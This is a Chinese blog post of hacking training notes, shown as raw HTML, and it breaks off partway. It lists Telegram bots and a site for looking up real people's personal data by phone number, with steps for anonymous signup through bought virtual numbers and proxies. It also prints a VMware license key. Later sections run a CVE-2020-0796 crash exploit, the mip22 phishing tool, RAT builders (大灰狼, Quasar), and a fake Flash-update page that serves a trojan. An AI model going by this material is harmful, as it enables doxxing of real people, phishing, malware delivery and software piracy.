<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Tangxianshen" />



<meta name="description" content="day01一.社工库查询个人信息 首先，先进入社工机器人网站，社工机器人链接：https:&#x2F;&#x2F;t.me&#x2F;AJL01_bot?start&#x3D;C9uZSsbKX1 https:&#x2F;&#x2F;t.me&#x2F;pingansgk_bot?start&#x3D;ee95c5680fhttps:&#x2F;&#x2F;t.me&#x2F;JokerSGKbot?start&#x3D;87OE61VQhttps:&#x2F;&#x2F;t.me&#x2F;XingDun2Bot?star">
<meta property="og:type" content="article">
<meta property="og:title" content="社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页">
<meta property="og:url" content="http://example.com/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="day01一.社工库查询个人信息 首先，先进入社工机器人网站，社工机器人链接：https:&#x2F;&#x2F;t.me&#x2F;AJL01_bot?start&#x3D;C9uZSsbKX1 https:&#x2F;&#x2F;t.me&#x2F;pingansgk_bot?start&#x3D;ee95c5680fhttps:&#x2F;&#x2F;t.me&#x2F;JokerSGKbot?start&#x3D;87OE61VQhttps:&#x2F;&#x2F;t.me&#x2F;XingDun2Bot?star">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701496108709-24d5bdce-5803-4f86-a78d-966aa82af147.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701174193246-3f1917ae-c2ba-4d7d-82bb-9540cb083f6d.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701176937215-2a54c607-5264-4107-82b8-68eb8530e050.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701176846492-7ddb2090-722f-4c03-b7d1-9a5394899d46.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177005470-8600956c-3b72-494d-8f0c-f17ec9f95fdc.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177050851-9f4f90b6-a448-4a8f-adea-5a5a50358b76.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177088239-8fdc3266-4884-41aa-94ec-cb52eb29fae7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177579656-b995dede-3dd4-40ca-9d85-4838acde256c.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701526218824-4d9ceb4e-613c-427e-bbbc-460216774ece.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701513657484-b819617f-800a-466f-abc4-8e53242ac692.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701513953225-29324b07-cff7-4fa1-84e5-5a152b809690.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701514501841-d6cc42de-7efc-47c9-9dc2-8b7de264f21e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260223989-ffb24cd2-2f03-4395-b525-5e2caf237ae2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260491291-dd78b77d-4ab0-4b42-99b5-d54e0ca351b0.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260644031-37a484c1-8e9e-48d0-9a81-b79e33c1efbf.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260730816-b401ecfc-9948-4196-82ae-646f1a916226.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701262128837-7bc6b9e7-a7a9-4499-8a11-b06d17c949e3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701263150004-d9405baf-f491-401b-8c63-2cb9de73dd40.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701265437148-c0b2c864-d9ab-4ccc-ad7f-d6d9538f4276.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701263971529-f4d403ff-5495-449d-966e-0e353f0572fe.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701266304747-460c70b9-8792-4961-8dec-b825cf2b2f73.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701345758010-8bf80a29-ed49-4175-b8bb-b782ae8bf52e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701346891994-0c21bf8a-1a00-47f3-9fc2-1f5aa316f4d4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347587107-a191b8cb-e204-4e65-ad34-b3d498b3068a.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347273345-369cd3e6-5a19-4040-af5a-4e7b80e3bc90.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347667747-db064174-9508-45c8-b63c-25b37863de80.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347725376-ea673c92-61a1-4729-b45b-25d1e94b8729.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347788321-77fc72d9-2b97-45c8-a4bf-71e5f938364d.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701348429531-fbaa3c69-a381-47ee-9d19-2c2c07de9828.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701349032280-4d1480d0-9029-41c7-abbb-0586248bd882.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701350031429-7b9f6a5e-b8a3-4959-974d-bc849c0328fd.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701350265769-269d0e01-c146-413e-9aa0-a5c4b18c4902.png">
<meta property="article:published_time" content="2023-12-02T15:17:21.000Z">
<meta property="article:modified_time" content="2023-12-04T12:52:13.916Z">
<meta property="article:author" content="Tangxianshen">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701496108709-24d5bdce-5803-4f86-a78d-966aa82af147.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页 | Hexo</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 6.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/R-C.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/R-C.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-培训笔记01" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/" class="article-date">
      <time datetime="2023-12-02T15:17:21.000Z" itemprop="datePublished">2023-12-02</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h1 id="day01"><a href="#day01" class="headerlink" title="day01"></a>day01</h1><h2 id="一-社工库查询个人信息"><a href="#一-社工库查询个人信息" class="headerlink" title="一.社工库查询个人信息"></a>一.社工库查询个人信息</h2><ol>
<li><p>首先，先进入社工机器人网站，社工机器人链接：<a target="_blank" rel="noopener" href="https://t.me/AJL01_bot?start=C9uZSsbKX1">https://t.me/AJL01_bot?start&#x3D;C9uZSsbKX1</a></p>
<p><a target="_blank" rel="noopener" href="https://t.me/pingansgk_bot?start=ee95c5680f">https://t.me/pingansgk_bot?start&#x3D;ee95c5680f</a><br><a target="_blank" rel="noopener" href="https://t.me/JokerSGKbot?start=87OE61VQ">https://t.me/JokerSGKbot?start=87OE61VQ</a><br><a target="_blank" rel="noopener" href="https://t.me/XingDun2Bot?start=4eoHoLE">https://t.me/XingDun2Bot?start=4eoHoLE</a><br><a target="_blank" rel="noopener" href="https://sgk66.cc/">https://sgk66.cc/</a></p>
</li>
<li><p>其次，在右上角下载Telegram。</p>
</li>
<li><p>注册tg账号，进入sms接码平台，链接：<a target="_blank" rel="noopener" href="https://sms-activate.org/cn/freePrice#activation">https://sms-activate.org/cn/freePrice#activation</a>   注册sms账号，然后充值。</p>
</li>
<li><p>进入Xeno Link网站购买代理，Xeno Link的链接：<a target="_blank" rel="noopener" href="https://console.xenolink.net/#/register?code=vocvktBL">https://console.xenolink.net/#/register?code=vocvktBL</a>  </p>
</li>
<li><p>电脑下载代理软件clash for windows，clash for windows的链接：<a target="_blank" rel="noopener" href="https://clash-for-windows.updatestar.com/">https://clash-for-windows.updatestar.com/</a>  安卓版clash同理。</p>
</li>
<li><p>手机和电脑添加订阅，一键导入clash。手机和电脑在clash选择延迟低的结点（地区），打开系统代理开关</p>
</li>
<li><p>在sms平台购买国外虚拟手机号，选择印度尼西亚，在手机上telegram输入虚拟电话号码，等待电脑上的验证码。</p>
</li>
<li><p>在手机上输入发来的验证码，注册。</p>
</li>
<li><p>在telegram输入手机号可查询个人信息。最终的结果如下图</p>
</li>
</ol>
<p><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701496108709-24d5bdce-5803-4f86-a78d-966aa82af147.png" alt="图片.png"></p>
<h2 id="二-永恒之黑实验"><a href="#二-永恒之黑实验" class="headerlink" title="二.永恒之黑实验"></a>二.永恒之黑实验</h2><ol>
<li>安装VMware虚拟机,链接：<a target="_blank" rel="noopener" href="https://www.vmware.com/products/workstation-pro.html">https://www.vmware.com/products/workstation-pro.html</a><br>下载win10镜像，链接：<a target="_blank" rel="noopener" href="http://192.168.2.6:5244/">http://192.168.2.6:5244/</a></li>
<li>激活VMware：输入激活码：JU090-6039P-08409-8J0QH-2YR7F<br>在VMware中打开win10hei,配置win10hei虚拟机为nat模式，win+r,然后输入cmd，使用ipconfig命令查询win10hei的ip地址。ip地址为192.168.228.128</li>
<li>安装环境python3.12  链接：<a target="_blank" rel="noopener" href="http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E8%AF%AD%E8%A8%80%E7%8E%AF%E5%A2%83">http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E8%AF%AD%E8%A8%80%E7%8E%AF%E5%A2%83</a></li>
<li>在主机win+r,输入cmd，输入python，出现python3.12，在下载的python目录输入cmd,在输入python，出现python3.12，与主机的结果相同，则不需配置环境变量，否则需配置环境变量</li>
<li>在主机win+r,输入cmd，输入以下攻击命令：</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python .\CVE-2020-0796.py 192.168.75.128</span><br></pre></td></tr></table></figure>

<ol start="6">
<li>若缺少模块，输入pip3 install   xxxxx -i <a target="_blank" rel="noopener" href="http://mirrors.aliyun.com/pypi/simple/">http://mirrors.aliyun.com/pypi/simple/</a> –trusted-host mirrors.aliyun.com</li>
<li>再次输入python .\CVE-2020-0796.py 192.168.75.128</li>
<li>观察win10，发现win10蓝屏。</li>
</ol>
<p>sup:     tg:&#x2F;&#x2F;setlanguage?lang&#x3D;classic-zh-cn浏览器访问，tg转化中文</p>
<h2 id="三-观看1-x视频"><a href="#三-观看1-x视频" class="headerlink" title="三.观看1-x视频"></a>三.观看1-x视频</h2><p>链接：<br>渗透测试含义：通过实际的攻击进行安全测试与评估的方法<br>Web渗透测试含义：针对web应用程序展开<br>web渗透测试步骤：<br>1.信息收集<br>2.整站映射<br>3.漏洞扫描<br>4.漏洞利用<br>5.测试报告</p>
<h1 id="day02"><a href="#day02" class="headerlink" title="day02"></a>day02</h1><h2 id="一-了解操作系统的历史和种类"><a href="#一-了解操作系统的历史和种类" class="headerlink" title="一.了解操作系统的历史和种类"></a>一.了解操作系统的历史和种类</h2><ol>
<li><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701174193246-3f1917ae-c2ba-4d7d-82bb-9540cb083f6d.png" alt="图片.png"></li>
</ol>
<h2 id="二-钓鱼攻击"><a href="#二-钓鱼攻击" class="headerlink" title="二.钓鱼攻击"></a>二.钓鱼攻击</h2><ol>
<li>安装kali机并登录<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701176937215-2a54c607-5264-4107-82b8-68eb8530e050.png" alt="图片.png"></li>
<li>在kail机输入以下命令<br>（1）vim &#x2F;etc&#x2F;proxychains4.conf    把光标定位到最后一行，输入i,把socket4改成socket5，打开clash for windows的允许局域网，在socket5输入WLAN的ip:192.168.2.24  ,再输入端口7890<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701176846492-7ddb2090-722f-4c03-b7d1-9a5394899d46.png" alt="图片.png"><br>（2）proxychains4  get clone <a target="_blank" rel="noopener" href="http://gitub.com/makdosx/mip22">http://gitub.com/makdosx/mip22</a><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177005470-8600956c-3b72-494d-8f0c-f17ec9f95fdc.png" alt="图片.png"><br>（3）Ls，查看到mip22<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177050851-9f4f90b6-a448-4a8f-adea-5a5a50358b76.png" alt="图片.png"><br>（4）切换到mip22目录  Cd mip22<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177088239-8fdc3266-4884-41aa-94ec-cb52eb29fae7.png" alt="图片.png"><br>（5）增加权限  chmod +x .&#x2F;*<br>（6）proxychains4 bash .&#x2F;mip22.sh<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701177579656-b995dede-3dd4-40ca-9d85-4838acde256c.png" alt="图片.png"><br>（7）输入 1<br>（8）输入19<br>（9）输入3<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701526218824-4d9ceb4e-613c-427e-bbbc-460216774ece.png" alt="图片.png"></li>
</ol>
<h2 id="三-控制工具大灰狼的使用"><a href="#三-控制工具大灰狼的使用" class="headerlink" title="三.控制工具大灰狼的使用"></a>三.控制工具大灰狼的使用</h2><p>1.下载大灰狼软件<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701513657484-b819617f-800a-466f-abc4-8e53242ac692.png" alt="图片.png"><br>2.在物理机输入win+r,查看物理机的ip地址。打开大灰狼软件，在域名处输入物理机的ip地址192.168.2.24，生成一个木马软件Server.exe,将其拖入虚拟机win10hei的桌面。注意：物理机和虚拟机都要关闭杀毒软件和安全防护。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701513953225-29324b07-cff7-4fa1-84e5-5a152b809690.png" alt="图片.png">3.双击Server.exe，在物理机便能控制win1ohei。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701514501841-d6cc42de-7efc-47c9-9dc2-8b7de264f21e.png" alt="图片.png"></p>
<h1 id="day03"><a href="#day03" class="headerlink" title="day03"></a>day03</h1><h2 id="一-使用Quasar远控工具"><a href="#一-使用Quasar远控工具" class="headerlink" title="一.使用Quasar远控工具"></a>一.使用Quasar远控工具</h2><p>1.在主机下载Quasar远程控制工具，下载链接为：<a target="_blank" rel="noopener" href="http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/%E8%BF%9C%E6%8E%A7/windows%E7%97%85%E6%AF%92%E7%9B%91%E5%90%AC/Quasar%E6%9C%80%E6%96%B0%E5%86%85%E9%83%A8%E6%88%90%E5%91%98%E6%B1%89%E5%8C%96%E7%89%88%E8%BF%9C%E6%8E%A7%E5%B7%A5%E5%85%B7.rar">http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/%E8%BF%9C%E6%8E%A7/windows%E7%97%85%E6%AF%92%E7%9B%91%E5%90%AC/Quasar%E6%9C%80%E6%96%B0%E5%86%85%E9%83%A8%E6%88%90%E5%91%98%E6%B1%89%E5%8C%96%E7%89%88%E8%BF%9C%E6%8E%A7%E5%B7%A5%E5%85%B7.rar</a>   下载后解压安装。<br>2.打开Quasar工具，点击生成，再点击连接设置，输入主机的ip地址，再生成客户端Client-built.exe。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260223989-ffb24cd2-2f03-4395-b525-5e2caf237ae2.png" alt="图片.png"><br>3.打开win10hei虚拟机，关闭杀毒软件，把主机上的客户端Client-built.exe移到win10hei的桌面，然后在主机上的Quasar工具的设置界面开启监听，然后点击保存。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260491291-dd78b77d-4ab0-4b42-99b5-d54e0ca351b0.png" alt="图片.png"><br>4.双击win10hei桌面的Client-built.exe，观察到Quasar的界面如图<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260644031-37a484c1-8e9e-48d0-9a81-b79e33c1efbf.png" alt="图片.png">5.右击这条ip地址，可以对win10hei进行远程控制操作。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701260730816-b401ecfc-9948-4196-82ae-646f1a916226.png" alt="图片.png"></p>
<h2 id="二-flash页面制作"><a href="#二-flash页面制作" class="headerlink" title="二.flash页面制作"></a>二.flash页面制作</h2><p>1.在主机下载phpstudy,   链接为： <a target="_blank" rel="noopener" href="http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%A7%86%E9%A2%91/%E6%9A%97%E6%9C%882022/%E4%B8%80%EF%BC%9A%E5%85%A8%E6%A0%88%E6%B8%97%E9%80%8F%E3%80%90%E6%B3%89%E5%B7%9E%E5%A4%A7%E7%99%BD%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E3%80%91/5%EF%BC%9AWEB%E5%AE%89%E5%85%A8php%E5%9F%BA%E7%A1%80%E3%80%90%E6%B3%89%E5%B7%9E%E5%A4%A7%E7%99%BD%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E3%80%91/phpStudy_64.zip">http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%A7%86%E9%A2%91/%E6%9A%97%E6%9C%882022/%E4%B8%80%EF%BC%9A%E5%85%A8%E6%A0%88%E6%B8%97%E9%80%8F%E3%80%90%E6%B3%89%E5%B7%9E%E5%A4%A7%E7%99%BD%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E3%80%91/5%EF%BC%9AWEB%E5%AE%89%E5%85%A8php%E5%9F%BA%E7%A1%80%E3%80%90%E6%B3%89%E5%B7%9E%E5%A4%A7%E7%99%BD%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E3%80%91/phpStudy_64.zip</a>  下载后把phpstudy移到win10hei的桌面<br>2.下载老师的flash.js文件，把flash.js文件移到win10hei的桌面。在主机的桌面新建txt文件，打开文件，把老师发的代码复制粘贴进去，重命名为index.html,并把index文件移到win10hei的桌面。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;Document&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;h1&gt;luyuguo hello world&lt;/h1&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>3.打开phpstudy,在首页点击启动apache。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701262128837-7bc6b9e7-a7a9-4499-8a11-b06d17c949e3.png" alt="图片.png"><br>4.点击网站，打开根目录，把win10hei桌面上的flash.js文件，index文件复制到根目录<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701263150004-d9405baf-f491-401b-8c63-2cb9de73dd40.png" alt="图片.png"><br>5.在win10hei的浏览器中输入win10的IP地址：192.168.228.128，出现以下图<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701265437148-c0b2c864-d9ab-4ccc-ad7f-d6d9538f4276.png" alt="图片.png"><br>6.右击flash.js文件，编辑文件，在文件的最后一行修改IP为192.168.228.128<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701263971529-f4d403ff-5495-449d-966e-0e353f0572fe.png" alt="图片.png">7.在index.html插入 <script src="./flash.js"></script>代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;Document&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;script src=&quot;./flash.js&quot;&gt;&lt;/script&gt;</span><br><span class="line">    &lt;h1&gt;luyuguo hello world&lt;/h1&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>8.在浏览器输入127.0.0.1&#x2F;，出现如下图<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701266304747-460c70b9-8792-4961-8dec-b825cf2b2f73.png" alt="图片.png"></p>
<h2 id="三-flash捆绑木马"><a href="#三-flash捆绑木马" class="headerlink" title="三.flash捆绑木马"></a>三.flash捆绑木马</h2><p>1.下载 flag.exe 文件，注意win10hei要关闭杀毒软件和安全防护,将flag.exe 复制到win10hei虛拟机的桌面上，，再将phpstudy的根目录中的falsh.exe删除，将flag exe拖到phpstudy的根目录中,重新命名为flash.exe,查看当前虚拟机IP地址是否更改，如果地址发生变化就对flash.js进行改动，没有就不需要改动，最后在物理机的浏览器上输入当前win10hei虚拟机的ip地址，<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701345758010-8bf80a29-ed49-4175-b8bb-b782ae8bf52e.png" alt="图片.png"><br>出现如下结果。会出现蚊子点击它们就会消失，点击立即升级就会下载修改好的flash.exe。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701346891994-0c21bf8a-1a00-47f3-9fc2-1f5aa316f4d4.png" alt="图片.png"><br>2.在主机下载WinRAR解压缩软件，链接为：<a target="_blank" rel="noopener" 